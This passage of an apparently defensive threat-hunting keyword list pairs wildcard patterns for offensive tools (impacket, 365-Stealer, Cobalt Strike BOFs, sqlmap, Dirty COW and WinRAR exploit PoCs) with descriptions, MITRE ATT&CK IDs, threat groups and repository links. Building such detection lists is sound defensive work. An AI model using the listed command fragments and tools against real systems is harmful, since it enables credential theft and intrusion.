thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,0,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -* CSExec.py*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -CShardDLLBytes*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* cups-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cups-queue-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --custom_user_agent*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* --custom-steal,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -* --custom-steal listusers*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -* --custom-steal onedrive*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -* --custom-steal onenote*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. 
It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -* --custom-steal outlook*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -* --cve=* --command*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* CVE-2023-38831-RaRCE*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -* cvs-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cvs-brute-repository.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -d * -dc * -nu 'neo4j' -np *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -d * -n * -m reverse*=,offensive_tool_keyword,InvisibilityCloak,Proof-of-concept obfuscation toolkit for C# post-exploitation tools,T1027 - T1059.003 - T1140 - T1107,TA0004 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/h4wkst3r/InvisibilityCloak,1,0,N/A,N/A,4,375,147,2022-07-22T14:13:53Z,2021-05-19T14:19:49Z -* -d * -n * -m rot13*,offensive_tool_keyword,InvisibilityCloak,Proof-of-concept obfuscation toolkit for C# post-exploitation tools,T1027 - T1059.003 - T1140 - T1107,TA0004 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/h4wkst3r/InvisibilityCloak,1,0,N/A,N/A,4,375,147,2022-07-22T14:13:53Z,2021-05-19T14:19:49Z -* -d * -t axfr >*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -d * -t zonewalk > *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -d * -t zonewalk*,offensive_tool_keyword,dnsrecon,DNSRecon is a Python port of a Ruby script that I wrote to learn the language and 
about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.,T1590 - T1590.001,TA0001 - TA0007,N/A,N/A,Information Gathering,https://github.com/darkoperator/dnsrecon,1,1,N/A,6,10,2336,516,2023-09-11T05:14:02Z,2010-12-16T03:25:49Z -* -d * -u * -p * --listener * --target *$DC_HOST*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -d * -u *\* -p * --da*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/ropnop/windapsearch,1,0,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -* -d *Active Protection DLL for SylantStrike*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -* -d:sleepmask*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -* daap-get-library.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -daisyserver *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* darkcodersc *,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,0,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -* darkexe.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -* daytime.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* db2-das-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* --dbms=mysql -u *,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z
-* --dc * -m custom --filter *objectCategory*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -dc-host * -spn * -impersonate *,offensive_tool_keyword,Pachine,Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation),T1068 - T1078 - T1059.006,TA0003 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/ly4k/Pachine,1,0,N/A,8,3,262,37,2022-01-13T12:35:19Z,2021-12-13T23:15:05Z
-* -dc-ip * -so *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-* -dc-ip * -computer-pass *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-* -dc-ip * -dump *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -dc-ip * -impersonate *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-* --dc-ip * -request * -format hashcat*,offensive_tool_keyword,hashcat,Worlds fastest and most advanced password recovery utility.,T1110.001 - T1003.001 - T1021.001,TA0006 - TA0009 - TA0010,N/A,N/A,Credential Access,https://github.com/hashcat/hashcat,1,0,N/A,10,10,18342,2659,2023-10-03T07:17:40Z,2015-12-04T14:46:51Z
-* -dc-ip * -target-ip *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-* --dc-ip * --vuln --enabled*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -dc-ip *SAMDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* dclist *,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* dcow.c *,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,0,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z
-* dcow.cpp*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/gbonacini/CVE-2016-5195,1,0,N/A,N/A,3,289,122,2017-03-21T16:46:38Z,2016-10-23T00:16:33Z
-* -DDONUT_EXE *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z
-* --deauth * -a TR:GT:AP:BS:SS:ID wlan*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* decrypt *.aes.zip*,offensive_tool_keyword,EncryptedZIP,Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory,T1564.001 - T1027 - T1214.001,TA0005 - TA0010,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-* deepce.sh *--install*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* default_logins.txt*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z
-* Defense_Evasion.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z
-* DelegationBOF.c *,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z
-* delegationx64.o*,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z
-* delegationx86.o*,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z
-* deluge-rpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* demiguise.py*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,0,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z
-* Dendron.exe*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z
-* denied AXFR from *,greyware_tool_keyword,dns,Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z
-* 
